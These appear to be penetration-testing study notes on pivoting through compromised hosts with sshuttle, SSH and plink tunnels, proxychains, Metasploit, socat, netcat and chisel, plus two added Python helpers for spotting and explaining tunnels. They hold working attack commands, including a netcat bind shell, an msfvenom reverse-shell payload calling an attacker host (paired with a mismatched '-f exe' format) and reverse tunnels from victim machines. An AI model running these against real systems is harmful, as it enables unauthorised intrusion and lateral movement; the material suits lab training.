Using sshuttle:
---------------
sudo sshuttle -r user@10.10.10.10 192.168.1.0/24
Port forwarding: accepting traffic on a given IP address and port and redirecting
it to a different IP address and port.
Inbound: traffic initiated from outside.
Outbound: traffic initiated from inside.
time nmap -p- portquiz.net | grep -i open
/ Helps in checking which outbound ports are open: portquiz.net answers on every TCP port, so the ports nmap reports open are the ones egress filtering lets out
Example:
--------
A Windows XP machine is only allowed outbound traffic on ports 80 and 443, but we need to reach a server
in the same network over RDP (3389). To reach it we need port forwarding,
which means an intermediate proxy --> this can be our Kali Linux machine.
On Kali:
-------- Needs to have a public address (not sure)
vi /etc/rinetd.conf                 / rinetd = port forwarding utility; this is its config
I
#bindaddress bindport connect address connect port
KALI_Public_IP 80 RDP_Server_address 3389
esc
:wq
/ We set rinetd up to accept traffic on the external interface on TCP port 80 and
redirect it to port 3389 on the remote Windows server
/etc/init.d/rinetd restart
Copy the Kali IP (proxy IP) and connect to it with the Windows RDP client --> you can access the server
rinetd forwards the incoming traffic to the Windows 2003 remote desktop service
SSH = Tunnelling & Proxies:
-----------------------------
SSH local port forwarding: ssh -L
---------------------------------
Allows us to connect a local port to a remote port over an encrypted SSH tunnel.
SSH remote port forwarding: ssh -R
---------------------------------
Allows us to tunnel a remote port to a local port over an encrypted SSH tunnel.
ON VICTIM machine:
====================
plink.exe is an SSH client for Windows
netstat -an | find "LISTEN"     / RDP port is open
/ We would like to access the RDP port on this internal, non-routable machine
/ We can create a reverse SSH tunnel from the victim machine to our attacking box, tunnelling the remote desktop port out of the Windows machine and making that port available on the attacking box.
Check for listening ports:
netstat -an | find "LISTEN"
From the victim machine, do a reverse SSH tunnel:
Remote Port Forwarding:
--------------------------
On VICTIM machine:
--------------------
plink -l username -pw password KALI_IP -R Attacker_port_to_receive:127.0.0.1:Victim_port_to_forward
plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389
On KALI:
--------
netstat -antp | grep LISTEN      / We can find 3390 listening on the Kali machine
rdesktop 127.0.0.1:3390          / Log in through RDP using the remote tunnel
DYNAMIC PORT FORWARDING (SOCKS4 proxy):
---------------------------------------
On Kali:
--------
ssh -D 8080 root@VICTIM_IP        / Needs the password --> we log in; the SSH session on port 22 also carries the forwarded traffic, with a SOCKS proxy on local port 8080
netstat -atnp | grep 8080         / Check whether the port is open
nano /etc/proxychains.conf
socks4 127.0.0.1 8080
proxychains nmap -p 3389 -sT -Pn Victim_IP/24 --open   / Nmap TCP connect scan of the victim's network for RDP
/ Proxychains takes this traffic and redirects it through the tunnel into the DMZ network (in this example); this is slow
proxychains netdiscover -r VICTIM_IP/24
proxychains rdesktop IP_found_from_nmap
Port Forwarding using Metasploit:
-----------------------------------
Get a meterpreter session first --> note the IP address of the victim (10.7.0.22)
background
route add 10.7.0.0 255.255.255.0 1        / route the 10.7.0.0/24 network through session 1
portfwd add -l 445 -p 445 -r 10.7.0.22    / local port 445 --> 10.7.0.22:445 through the session
Port Forwarding using SoCat:
-----------------------------
Start socat listeners for Victim_machine2's ports 8009 & 8080 on the first compromised machine (Victim-1).
From the Victim-1 machine: do a port scan as above and port forward the required ports
/ Binding the Victim-2 ports on the Victim-1 machine so that we can access them from our Kali machine
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 &
netstat -plunt      / View the bound ports; we can see 8009 & 8080 on Victim_machine1
Access the Victim-2 ports on our Kali machine; on the Victim-1 machine: socat tcp-listen:4321,fork tcp:KALI_IP:4321 &
Port Forwarding using Netcat:
-----------------------------
nc -l -p $localport -c "nc $remotehost $remoteport"   / Relay: listen locally and hand each client to remotehost:remoteport
netcat -nvlp 9001                   / Listen on port 9001
netcat -l -p 9001 -e /bin/bash      / Bind a bash shell to port 9001
netcat -L KALI_IP:80 -p 9002        / Forward local port 9002 to remote port 80
netcat -L KALI_IP:80 -p 9002 -x     / Port forward with a hex dump of the traffic
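The netstat checks above (netstat -antp | grep LISTEN, netstat -plunt) are also how a defender spots these relays. As an added example, not part of the original notes: a Python parser for netstat -plunt output that flags listeners owned by relay tools, sshd listening off its usual port (an ssh -R forward) or an ssh client listening locally (-L/-D). The sample output is constructed, and the tool-name list and expected sshd port are assumptions.

```python
"""Defender-side check: spot port-forwarding relays in `netstat -plunt` output.
Added example, not from the original notes; SAMPLE is constructed output and
TUNNEL_TOOLS / SSH_EXPECTED_PORTS are assumptions to tune per environment."""

TUNNEL_TOOLS = {"socat", "chisel", "plink", "plink.exe", "nc", "netcat", "ncat", "rinetd"}
SSH_EXPECTED_PORTS = {22}  # where sshd is supposed to listen (assumption)

SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:3390          0.0.0.0:*               LISTEN      1450/sshd: root
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      2210/socat
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      2301/ssh
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      901/nginx
udp        0      0 0.0.0.0:68              0.0.0.0:*                           600/dhclient
"""

def parse_netstat(text: str) -> list:
    """Parse Linux `netstat -plunt` rows into dicts; udp rows have no State column."""
    rows = []
    for line in text.splitlines():
        if not line.startswith(("tcp", "udp")):
            continue                                  # skip header lines
        proto, _, _, local, _, rest = line.split(None, 5)
        # tcp: rest = "LISTEN      812/sshd"; udp: rest = "600/dhclient"
        state, _, pidprog = rest.partition(" ") if proto.startswith("tcp") else ("", "", rest)
        pid, _, prog = pidprog.strip().partition("/")
        bind, _, port = local.rpartition(":")
        rows.append({"proto": proto, "bind": bind, "port": int(port), "state": state,
                     "pid": pid, "prog": prog.split(":")[0].strip()})  # "sshd: root" -> sshd
    return rows

def find_forwarders(rows: list) -> list:
    """Return (port, prog, reason) tuples for listeners that look like pivot tunnels."""
    findings = []
    for r in rows:
        if r["proto"].startswith("tcp") and r["state"] != "LISTEN":
            continue
        if r["prog"] in TUNNEL_TOOLS:
            findings.append((r["port"], r["prog"], "listener owned by a relay/tunnel tool"))
        elif r["prog"] == "sshd" and r["port"] not in SSH_EXPECTED_PORTS:
            findings.append((r["port"], r["prog"], "sshd listening off-port: ssh -R remote forward"))
        elif r["prog"] == "ssh":
            findings.append((r["port"], r["prog"], "ssh client listening: -L forward or -D SOCKS proxy"))
    return findings

if __name__ == "__main__":
    for port, prog, reason in find_forwarders(parse_netstat(SAMPLE)):
        print(f"port {port:>5} ({prog}): {reason}")
```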
Pivoting (notes from GitHub):
PORT FORWARDING "port to port":
----MSF----
Most platforms
Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse
----SSH----
For Linux
~C "if you already have an SSH session: ~C opens the ssh command line, then type the -R/-L line there"
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh -R 12345:192.168.122.228:5986 test@10.1.1.1
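As an added example (not part of the original notes or the gist they came from), covering the -L/-R definitions earlier in the page and the arrow diagrams in this section: a Python helper that parses an ssh/plink -L, -R or -D spec and states which end of the SSH session listens and which end makes the onward connection. The CLIENT/SERVER labels are this example's own wording.

```python
"""Explain an OpenSSH/plink forwarding flag: which end of the SSH session listens
and which end makes the onward connection. Added teaching example, not from the
original notes; the CLIENT/SERVER labels are this example's own wording."""
import re

CLIENT = "ssh client (the machine the command runs on)"
SERVER = "ssh server (the machine being logged into)"

# OpenSSH syntax: [bind_address:]port:host:hostport (IPv4 addresses/hostnames only here)
FORWARD = re.compile(r"^(?:(?P<bind>[^:]+):)?(?P<port>\d+):(?P<host>[^:]+):(?P<hostport>\d+)$")
DYNAMIC = re.compile(r"^(?:(?P<bind>[^:]+):)?(?P<port>\d+)$")

def explain_forward(flag: str, spec: str) -> dict:
    """flag is -L, -R or -D. Returns who listens, on what bind:port, who connects
    and to where. Default bind is loopback, as in OpenSSH without GatewayPorts."""
    if flag == "-D":
        m = DYNAMIC.match(spec)
        if not m:
            raise ValueError(f"bad -D spec: {spec}")
        # -D: the client listens as a SOCKS proxy; the server connects to whatever
        # host:port each SOCKS client asks for (the "dynamic" / port-to-any case)
        return {"listens_on": CLIENT, "bind": m["bind"] or "127.0.0.1",
                "port": int(m["port"]), "connects_from": SERVER,
                "target": "any host:port requested through SOCKS"}
    m = FORWARD.match(spec)
    if not m or flag not in ("-L", "-R"):
        raise ValueError(f"bad {flag} spec: {spec}")
    target = f"{m['host']}:{m['hostport']}"
    # -L: the listener is on the client side and the server dials the target.
    # -R: the listener is on the server side and the client dials the target.
    listener, dialer = (CLIENT, SERVER) if flag == "-L" else (SERVER, CLIENT)
    return {"listens_on": listener, "bind": m["bind"] or "127.0.0.1",
            "port": int(m["port"]), "connects_from": dialer, "target": target}

def diagram(flag: str, spec: str) -> str:
    """Render the arrow notation the notes use: listener on the left, target on the right."""
    e = explain_forward(flag, spec)
    return (f"<{e['listens_on']}> {e['bind']}:{e['port']} "
            f"<------------ {e['target']}  (connection made by the {e['connects_from']})")

if __name__ == "__main__":
    for flag, spec in (("-R", "8081:172.24.0.2:80"), ("-L", "0.0.0.0:4445:10.1.1.1:4443"), ("-D", "1080")):
        print(flag, spec, "=>", diagram(flag, spec))
```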
---PLINK----
Just like SSH, on Windows
service ssh start, and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
---SOCAT----
For linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
---CHISEL----
Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:[YOUR LOCAL IP]:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------
DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf
----MSF----
Most platforms
Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)
----SSH----
For Linux
-D1080
---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL----
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
Depending on your scope, some of the machines may not be directly accessible. Some systems are dual-homed and let you connect into an internal network. You will need to know some of these techniques in order to obtain access into their non-public networks:
- Abatchy’s Port Forwarding Guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide
- Windows Port Forwarding: http://woshub.com/port-forwarding-in-windows/
- SSH Tunneling Explained: https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/
- Understanding Proxy Tunnels: https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
- Understanding Port forwarding with Metasploit: https://www.offensive-security.com/metasploit-unleashed/portfwd/
- Explore Hidden Networks with Double Pivoting: https://pentest.blog/explore-hidden-networks-with-double-pivoting/
- 0xdf hacks stuff. Pivoting and Tunneling: https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
Tools to help you with Port Forwarding and Pivoting:
- Proxychains: https://github.com/haad/proxychains
- Proxychains-ng: https://github.com/rofl0r/proxychains-ng
- SSHuttle (Totally Recommend learning this): https://github.com/sshuttle/sshuttle
- SSHuttle Documentation: https://sshuttle.readthedocs.io/en/stable/
Vulnerable systems to practice pivoting:
- Wintermute: https://www.vulnhub.com/entry/wintermute-1,239/